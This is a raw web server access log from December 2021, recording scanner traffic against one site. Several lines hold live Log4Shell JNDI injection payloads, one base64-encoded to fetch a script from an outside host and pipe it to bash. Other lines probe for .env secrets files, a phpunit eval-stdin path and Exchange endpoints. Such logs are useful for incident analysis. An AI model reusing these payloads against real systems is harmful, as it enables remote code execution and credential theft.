[23/Dec/2021:01:05:06 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==} HTTP/1.1" 435
[23/Dec/2021:02:28:51 +0100] 54.73.242.228 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 391
[23/Dec/2021:02:58:53 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[23/Dec/2021:02:59:24 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[23/Dec/2021:02:59:25 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[23/Dec/2021:02:59:26 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[23/Dec/2021:02:59:29 +0100] 198.20.87.98 TLSv1.2 AES256-SHA "quit" 379
[23/Dec/2021:02:59:31 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407
[23/Dec/2021:02:59:38 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309
[23/Dec/2021:02:59:48 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[23/Dec/2021:04:16:07 +0100] 130.211.54.158 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301
[23/Dec/2021:04:22:18 +0100] 54.246.51.5 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 377
[23/Dec/2021:04:34:10 +0100] 163.172.180.25 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 385
[23/Dec/2021:04:49:07 +0100] 131.220.6.152 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[23/Dec/2021:05:06:41 +0100] 85.159.213.60 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301
[23/Dec/2021:06:49:37 +0100] 185.220.101.146 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[23/Dec/2021:06:56:32 +0100] 128.14.134.134 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[23/Dec/2021:07:13:05 +0100] 192.241.204.61 TLSv1.2 AES256-SHA "GET /actuator/health HTTP/1.1" 310
[23/Dec/2021:09:11:27 +0100] 192.241.204.61 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[23/Dec/2021:09:22:00 +0100] 192.241.213.23 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[23/Dec/2021:10:30:44 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[23/Dec/2021:11:05:13 +0100] 163.172.180.25 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 389
[23/Dec/2021:11:05:37 +0100] 51.15.195.246 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 400
[23/Dec/2021:11:46:56 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[23/Dec/2021:12:11:18 +0100] 185.184.152.140 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /${jndi:ldap://90.84.178.188:1389/Exploit} HTTP/1.1" 428
[23/Dec/2021:12:11:19 +0100] 185.184.152.140 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[23/Dec/2021:12:11:20 +0100] 185.184.152.140 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[23/Dec/2021:12:11:21 +0100] 185.184.152.140 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?s=${jndi:ldap://90.84.178.188:1389/Exploit} HTTP/1.1" 431
[23/Dec/2021:12:24:46 +0100] 164.68.103.201 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST / HTTP/1.1" 301
[23/Dec/2021:12:24:47 +0100] 164.68.103.201 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[23/Dec/2021:13:52:37 +0100] 23.251.102.82 TLSv1.2 DHE-RSA-AES256-SHA256 "GET /solr/ HTTP/1.1" 304
[23/Dec/2021:13:59:47 +0100] 212.71.237.219 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301
[23/Dec/2021:14:29:30 +0100] 192.241.215.35 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[23/Dec/2021:15:15:47 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /mifs/.;/services/LogService HTTP/1.1" 318
[23/Dec/2021:15:33:12 +0100] 45.72.48.130 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[23/Dec/2021:15:46:49 +0100] 128.14.133.58 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[23/Dec/2021:15:47:02 +0100] 128.14.133.58 TLSv1.2 DHE-RSA-AES256-SHA256 "HEAD /icons/sphere1.png HTTP/1.1" -
[23/Dec/2021:16:51:13 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 315
[23/Dec/2021:17:40:59 +0100] 167.248.133.43 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[23/Dec/2021:17:40:59 +0100] 167.248.133.43 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[23/Dec/2021:18:24:45 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[23/Dec/2021:19:08:52 +0100] 192.241.212.10 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[23/Dec/2021:19:09:53 +0100] 192.241.211.160 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[23/Dec/2021:19:11:44 +0100] 192.241.200.235 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[23/Dec/2021:19:29:20 +0100] 51.158.118.231 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 392
[23/Dec/2021:19:38:27 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[23/Dec/2021:19:39:09 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[23/Dec/2021:19:39:10 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[23/Dec/2021:19:39:11 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[23/Dec/2021:19:39:14 +0100] 198.20.87.98 TLSv1.2 AES256-SHA "quit" 379
[23/Dec/2021:19:39:16 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394
[23/Dec/2021:19:39:16 +0100] 198.20.87.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407
[23/Dec/2021:20:33:42 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[23/Dec/2021:20:51:05 +0100] 128.14.141.34 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[23/Dec/2021:20:57:12 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[23/Dec/2021:21:53:02 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==} HTTP/1.1" 435
[23/Dec/2021:21:56:11 +0100] 45.155.126.3 TLSv1.2 AES256-SHA "-" -
[23/Dec/2021:23:00:11 +0100] 128.14.209.226 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 297
[23/Dec/2021:23:27:26 +0100] 3.249.60.79 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 394
[23/Dec/2021:23:55:33 +0100] 66.240.236.116 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[24/Dec/2021:00:27:13 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[24/Dec/2021:00:27:14 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.env HTTP/1.1" 304
[24/Dec/2021:00:49:29 +0100] 162.221.192.26 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301